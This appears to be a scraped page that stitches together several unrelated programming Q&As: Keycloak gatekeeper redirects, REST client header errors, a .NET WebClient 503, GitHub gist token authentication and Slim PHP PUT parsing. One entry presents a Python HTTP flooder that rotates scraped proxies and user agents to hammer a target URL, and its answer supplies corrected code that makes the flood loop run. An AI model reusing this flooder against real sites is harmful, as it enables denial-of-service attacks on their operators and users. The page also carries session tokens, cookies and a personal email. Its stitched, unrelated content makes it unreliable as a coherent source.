I have a backend hello world app, using the following ACLS
match-claims:
aud: appserver
iss: http://192.168.1.132/auth/realms/master
resources:
- uri: /app
methods:
- GET
roles:
- user
require-any-role: true
causes 404 right after login, with the following logs
gatekeeper_1 | 1.5576708594647906e+09 error keycloak-gatekeeper/middleware.go:108 no session found in request, redirecting for authorization {"error": "authentication session not found"}
nginx_1 | 172.23.0.1 - - [12/May/2019:22:20:59 +0800] "GET /app HTTP/1.1" 307 95 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131
Safari/537.36"
gatekeeper_1 | 1.5576708594775462e+09 debug keycloak-gatekeeper/handlers.go:88 incoming authorization request from client address {"access_type": "", "auth_url": "http://192.168.1.132/auth/realms/master/protocol/openid-connect/auth?client_id=appserver&redirect_uri=http%3A%2F%2Flocalhost%2Foauth%2Fcallback&response_type=code&scope=openid+email+profile&state=9e9edff9-b532-45e8-8b57-ed30783b38d6", "client_ip": "172.23.0.6:42310"}
nginx_1 | 172.23.0.1 - - [12/May/2019:22:20:59 +0800] "GET /oauth/authorize?state=9e9edff9-b532-45e8-8b57-ed30783b38d6 HTTP/1.1" 307 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
nginx_1 | 172.23.0.1 - - [12/May/2019:22:20:59 +0800] "GET /auth/realms/master/protocol/openid-connect/auth?client_id=appserver&redirect_uri=http%3A%2F%2Flocalhost%2Foauth%2Fcallback&response_type=code&scope=openid+email+profile&state=9e9edff9-b532-45e8-8b57-ed30783b38d6 HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
nginx_1 | 172.23.0.1 - appserver [12/May/2019:22:20:59 +0800] "POST /auth/realms/master/protocol/openid-connect/token HTTP/1.1" 200 3507 "-" "Go-http-client/1.1"
gatekeeper_1 | 1.557670859584654e+09 info keycloak-gatekeeper/handlers.go:167 issuing access token for user {"email": "benjamin.hon#biomind.ai", "expires": "2019-05-12T14:21:59Z", "duration": "59.4153639s"}
nginx_1 | 172.23.0.1 - - [12/May/2019:22:20:59 +0800] "GET /oauth/callback?state=9e9edff9-b532-45e8-8b57-ed30783b38d6&session_state=bea8afff-1137-4a60-beb5-cf05a9974b34&code=ce737cdb-f3b2-4c8f-9198-5f5e0d80e2f4.bea8afff-1137-4a60-beb5-cf05a9974b34.10d7e9eb-226b-4ac8-890e-6c640ab53059 HTTP/1.1" 307 37 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
nginx_1 | 172.23.0.1 - - [12/May/2019:22:20:59 +0800] "GET / HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
nginx_1 | 172.23.0.1 - - [12/May/2019:22:20:59 +0800] "GET /auth/realms/master/protocol/openid-connect/auth?client_id=appserver&redirect_uri=http%3A%2F%2Flocalhost%2Foauth%2Fcallback&response_type=code&scope=openid+email+profile&state=9e9edff9-b532-45e8-8b57-ed30783b38d6 HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
nginx_1 | 172.23.0.1 - appserver [12/May/2019:22:20:59 +0800] "POST /auth/realms/master/protocol/openid-connect/token HTTP/1.1" 200 3507 "-" "Go-http-client/1.1"
gatekeeper_1 | 1.5576708598920956e+09 info keycloak-gatekeeper/handlers.go:167 issuing access token for user {"email": "benjamin.hon#biomind.ai", "expires": "2019-05-12T14:21:59Z", "duration": "59.107928s"}
nginx_1 | 172.23.0.1 - - [12/May/2019:22:20:59 +0800] "GET /oauth/callback?state=9e9edff9-b532-45e8-8b57-ed30783b38d6&session_state=bea8afff-1137-4a60-beb5-cf05a9974b34&code=fc79909a-3b36-4140-ac6a-cc340b621398.bea8afff-1137-4a60-beb5-cf05a9974b34.10d7e9eb-226b-4ac8-890e-6c640ab53059 HTTP/1.1" 307 37 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
However, it works if i use the follow ACLS
resources:
- uri: /app
methods:
- GET
white-listed: true
I've checked everything, the roles are assigned and created.
This is the JWT i get after logging in
{
"jti": "04de181a-bf9a-4db3-bfcc-006a12d00892",
"exp": 1557672962,
"nbf": 0,
"iat": 1557672902,
"iss": "http://192.168.1.132/auth/realms/master",
"aud": [
"account",
"appserver"
],
"sub": "d7a580b3-7987-40fa-905d-5be1662392ee",
"typ": "Bearer",
"azp": "appserver",
"auth_time": 1557672902,
"session_state": "71353c04-3e7c-4cf4-9203-fea485990fe9",
"acr": "1",
"realm_access": {
"roles": [
"offline_access",
"uma_authorization",
"user"
]
},
"resource_access": {
"account": {
"roles": [
"manage-account",
"manage-account-links",
"view-profile"
]
}
},
"scope": "openid profile email",
"email_verified": true,
"name": "john doe",
"preferred_username": "john",
"given_name": "john",
"family_name": "doe",
"email": "xxx"
}
It seems to me that the authentication is working, but after the authorization, it seems to not redirect it to the internal proxy of the backend app, but to http://localhost instead?
I don't really know how to debug this though, any help will be appreciated!
ahh i got it to work there was two things that needs to be set
secure-cookie: false
redirect-url: <gatekeeper url>
Related
Execute http POST request by the Postman (desktop version):
http://127.0.0.1:8090/api/profiles/export
Header:
Host: 127.0.0.1:8090
Connection: keep-alive
Content-Length: 282
Accept: application/json, text/plain, */*
X-XSRF-TOKEN: CfDJ8CQGvOgKAdr991T0W48TbmbJulHjCLSNl5Ufw9B-aa4W8FnpeleEvRxItMC3lj0KiyXTrhn9vOR3RCtTxSIpCh1d3JfjRIT2GRk3osT3e_7g
Authorization: gUqILBH5fUu+ZIU98Xq62g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Content-Type: application/json
Origin: http://127.0.0.1:8090
Referer: http://127.0.0.1:8090/folders/cpes/1189/profiles
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9,ru-RU;q=0.8,ru;q=0.7,en-US;q=0.6
Cookie: .AspNetCore.Antiforgery.vAmb-7is-9Q=CfDJ-N_Krwb3YlxI4utC_l6qsoVQQc8YY6DeFOfaTVHkx8bFMqDtjDRN0N1O3MmbfbRYSq72tic5B-MPpiybWUtaEbtaXIvHiBbRpOsYG5vj66tkYlrY-j6CA; XSRF-TOKEN=CfDJ8CQGvOgpT-VClVphMqoot5levDSTI5VFGbACv6z7_pXhiCrcdtKAdr991T0W48TbmbJulHjCLSNl5Ufw9B-aa4W8FnpeleEvRxItMC3lj0KiyXTrhn9vOR3RCtTxSIpCh1d3JfjRIT2GRk3osT3e_7g
Payload:
{"Interval":0,"Request":{"folderId":1189,"filter":"{}","visibleColumns":["profileType","name","description","managedGroups","parentFolder.name"],"visibleColumnsNames":["Profile Type","Name","Description","Assigned To (Managed Groups)","Parent"],"orders":"profileType:asc,name:asc"}}
Get success response:
{
"code": 200,
"result": {
"ftpAddress": "ftp://127.0.0.1/export/",
"fileName": "admin_Profiles_20220728160913.csv"
}
}
Nice. I can execute this request by POSTMAN many times with success response. OK.
Now I want to execute SAME POST request by Advance REST Client (Chrome extenstion).
But I get error:
<html>
<head><title>400 Bad Request</title></head>
<body>
<center><h1>400 Bad Request</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>
The code used to work.
The URL in question is
https://yobit.net/api/3/info
It works in IE. It used to work with webclient. It doesn't work in webclient now. And I wonder what the problem is
Suddenly it stops working. So I am checking
Try
Dim wc = New WebClient
wc.Headers.Add("Accept", "text/html, application/xhtml+xml, image/jxr, */*")
wc.Headers.Add("Accept-Encoding", "gzip, deflate")
wc.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko")
wc.Headers.Add("Accept-Language", "en-US,en;q=0.5")
wc.DownloadString(URL)
Catch ex As Exception
End Try
I also tried simple version. Not working
Try
Dim wc = New WebClient
wc.DownloadString(URL)
Catch ex As Exception
End Try
In both cases yobit throw 503 access denied exception
I use fiddler and try to use internetexplorer to access directly
It works fine
GET https://yobit.net/api/3/info HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: yobit.net
Connection: Keep-Alive
Cookie: __cfduid=de63c60d603f271520b9ee58dfdd257061517932785; cf_clearance=7e58588df28b267842f753567dcdc475d29679a6-1517932789-86400; locale=en
If I use webclient this is the header
GET https://yobit.net/api/3/info HTTP/1.1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Accept: text/html, application/xhtml+xml, image/jxr, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: yobit.net
Connection: Keep-Alive
Almost the exact same thing.
Let me try another URL
Say http://google.com
GET http://www.google.com/ HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.google.com
Connection: Keep-Alive
Cookie: NID=121=GUd4VKHT_gcwUx-hK39mphuCg93Q_W2fL_yCc-JO3AJkgh74EGajif0537eraLK8ns2EdEQPexOOeBxSlOxVrj8t_AVn21FRme2hAxuLXz4F8aCZExIzME4jaYMBuUp_lnak5Q; OGPC=19004116-3:; 1P_JAR=2018-1-9-7
If I use webclient
GET http://google.com/ HTTP/1.1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Accept: text/html, application/xhtml+xml, image/jxr, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: google.com
Connection: Keep-Alive
Both works.
There could be different issues here
Framework Version
You recently changed the framework version and that has some issue which causes it not to work. You can change the framework versions and see if it helps
Compression of Data
WebClient by default is not doing decompression and you add headers to request gzip data if available. Now there is a possibility that the site didn't enable gzip earlier which made it work for you and now they have enabled gzip responses. You can fix that by changing
wc.Headers.Add("Accept-Encoding", "gzip, deflate")
to
wc.Headers.Add("Accept-Encoding", "deflate")
Or if you want the data to come in compressed form only, then you can enable auto decompression as shown in below code
class Program
{
class MyWebClient : WebClient
{
protected override WebRequest GetWebRequest(Uri address)
{
var request = base.GetWebRequest(address) as HttpWebRequest;
request.AutomaticDecompression = DecompressionMethods.Deflate | DecompressionMethods.GZip;
return request;
}
}
public static void Main(string[] args)
{
var URL = "https://yobit.net/api/3/info";
var wc = new WebClient();
wc.Headers.Add("Accept", "text/html, application/xhtml+xml, image/jxr, */*");
wc.Headers.Add("Accept-Encoding", "gzip, deflate");
wc.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko");
wc.Headers.Add("Accept-Language", "en-US,en;q=0.5");
Console.WriteLine(wc.DownloadString(URL));
// TODO: Implement Functionality Here
Console.Write("Press any key to continue . . . ");
Console.ReadKey(true);
}
}
The above example is C# and not VB.NET but you can easily convert it
I've created a personal access token (https://github.com/settings/tokens) giving Gist perms.
I'm trying to use it to create a gist but I'm getting
{
"message": "Not Found",
"documentation_url": "https://developer.github.com/v3"
}
My request is:
POST /gist HTTP/1.1
Host: api.github.com
Connection: close
X-Client-Data: CJO2yQEIorbJAQjBtskBCPqcygEIqZ3KAQjSncoBCKijygE=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Accept-Language: en-US,en;q=0.8,es;q=0.6
Authorization: Basic blablablablablabla
Content-Length: 142
{
"description": "the description for this gist",
"files": {
"file1.txt": {
"content": "String file contents"
}
}
}
Can't personal tokens being used to post in gist?
The problem is that Basic authentication should not be used but a specific header to provide the token. The request should be:
POST /gist HTTP/1.1
Host: api.github.com
Connection: close
X-Client-Data: CJO2yQEIorbJAQjBtskBCPqcygEIqZ3KAQjSncoBCKijygE=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Accept-Language: en-US,en;q=0.8,es;q=0.6
Authorization: token aabbaabbaabbabababababababababababababab
Content-Length: 142
{
"description": "the description for this gist",
"files": {
"file1.txt": {
"content": "String file contents"
}
}
}
I'm trying to improve 2 projects of flooders (not mine) making my own script that these 2 ones. Doing that, I've almost finished but I'm stuck in a point where the script does nothing.
Here is the code:
import socket, threading, random, time, urllib.request, re, os.path
from bs4 import BeautifulSoup
useragents=["Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A",
"Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko",
"Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1",
"Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
"Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16",
"Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1",]
def checkurl():
global url
url = input("Insert URL: ")
if url[0]+url[1]+url[2]+url[3] == "www.":
url = "http://" + url
elif url[0]+url[1]+url[2]+url[3] == "http":
pass
else:
url = "http://" + url
def threads():
global thread
try:
thread = int(input("Thread (800): "))
except:
thread = 800
def proxymode():
global choise1
choise1 = input("Do you want proxy mode? Answer 'y' to enable it: ")
if choise1 == "y":
choisedownproxy()
else:
exit(0)
def choisedownproxy():
choise2 = input("Do you want to download a fresh list of proxy? Answer 'y' to do it: ")
print ("")
if choise2 == "y":
proxyget()
else:
proxylist()
def proxyget():
if os.path.isfile("proxy.txt"):
out_file = open("proxy.txt","w")
out_file.write("")
out_file.close()
else:
pass
url = "https://www.inforge.net/xi/forums/liste-proxy.1118/"
soup = BeautifulSoup(urllib.request.urlopen(url), "lxml")
base = "https://www.inforge.net/xi/"
for tag in soup.find_all("a", {"class":"PreviewTooltip"}):
links = tag.get("href")
final = base + links
result = urllib.request.urlopen(final)
for line in result :
ip = re.findall("(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3}):(?:[\d]{1,5})", str(line))
if ip:
print("Proxy grabbed=> "+'\n'.join(ip))
for x in ip:
out_file = open("proxy.txt","a")
while True:
out_file.write(x+"\n")
out_file.close()
break
proxylist()
def proxylist():
global proxy
global entries
out_file = str(input("Enter the proxy list: "))
entries = open(out_file).readlines()
proxy = random.choice(entries).strip().split(':')
requestproxy()
def requestproxy():
global proxy
host = proxy[0]
port = proxy[1]
host_url = url.replace("http://", "").replace("https://", "").split('/')[0]
get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n"
useragent = "User-Agent: " + random.choice(useragents) + "\r\n"
accept = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate"
connection = "Connection: Keep-Alive\r\n"
request = get_host + useragent + accept + connection + "\r\n"
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(request)
except:
proxy = random.choice(entries).strip().split(':')
checkurl()
threads()
proxymode()
As you can see, this script uses a list of proxies to send request (using socket library) to target. But when I arrive at "Enter the proxy list" and after typed "proxy.txt", the script gets stuck! What did I do wrong? Can you help me?
After you entered "proxy.txt" the script opens the file and then calls requestproxy(). At the end of your requestproxy() you have a "while True". This is an infinite loop, so it will get stuck there unless there is a "break" somewhere, which isn't the case. You should probably add a break after s.send(request) and put the entire function into a loop. That way your infinite loop stops if the package has been sent, but if there was an exception it will try again with a different proxy.
That would look like this:
def requestproxy():
while True:
global proxy
host = proxy[0]
port = proxy[1]
host_url = url.replace("http://", "").replace("https://", "").split('/')[0]
get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n"
useragent = "User-Agent: " + random.choice(useragents) + "\r\n"
accept = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate"
connection = "Connection: Keep-Alive\r\n"
request = get_host + useragent + accept + connection + "\r\n"
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(request)
break
except:
proxy = random.choice(entries).strip().split(':')
I hope this helps. Have a nice day!
I am trying to update database using SLIM php. But the form data values passed in are showing blank. I have been successful in posting (customPOST) the values.
Here is the code:
AngularJs:
UpdateCategoryFormData:function(category,catId){
formData=new FormData();
angular.forEach(category, function (fieldData, field) {
formData.append(field, fieldData);
});
return Restangular.one('category/update',catId)
.withHttpConfig({transformRequest: angular.identity})
.customPUT(formData, undefined, {}, {'Content-Type': undefined});
}
SLIM php:
$app->put('/category/update/:catId',function($catId) use($app){
$data=$app->request->put();
print_r($data);
$catName=$app->request->put('catName');
$catParent=$app->request->put('catParent');
Result is:
array()
echo $catName;
I am getting a blank as the value of $catName;
Here is the copy of the headers:
Request Method:PUT
Status Code:200 OK
Response Headers
view source
Connection:Keep-Alive
Content-Length:10
Content-Type:text/html
Date:Fri, 28 Aug 2015 03:48:28 GMT
Keep-Alive:timeout=5, max=100
Server:Apache/2.4.9 (Win32) PHP/5.5.12
X-Powered-By:PHP/5.5.12
Request Headers
view source
Accept:application/json, text/plain, */*
Accept-Encoding:gzip, deflate, sdch
Accept-Language:en-US,en;q=0.8
Connection:keep-alive
Content-Length:249
Content-Type:multipart/form-data; boundary=----WebKitFormBoundary4gUX2gCt7zCICZNN
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2489.0 Safari/537.36
Request Payload
------WebKitFormBoundary4gUX2gCt7zCICZNN
Content-Disposition: form-data; name="catName"
Some Category
------WebKitFormBoundary4gUX2gCt7zCICZNN
Content-Disposition: form-data; name="catParent"
45
------WebKitFormBoundary4gUX2gCt7zCICZNN--
Can someone help pls!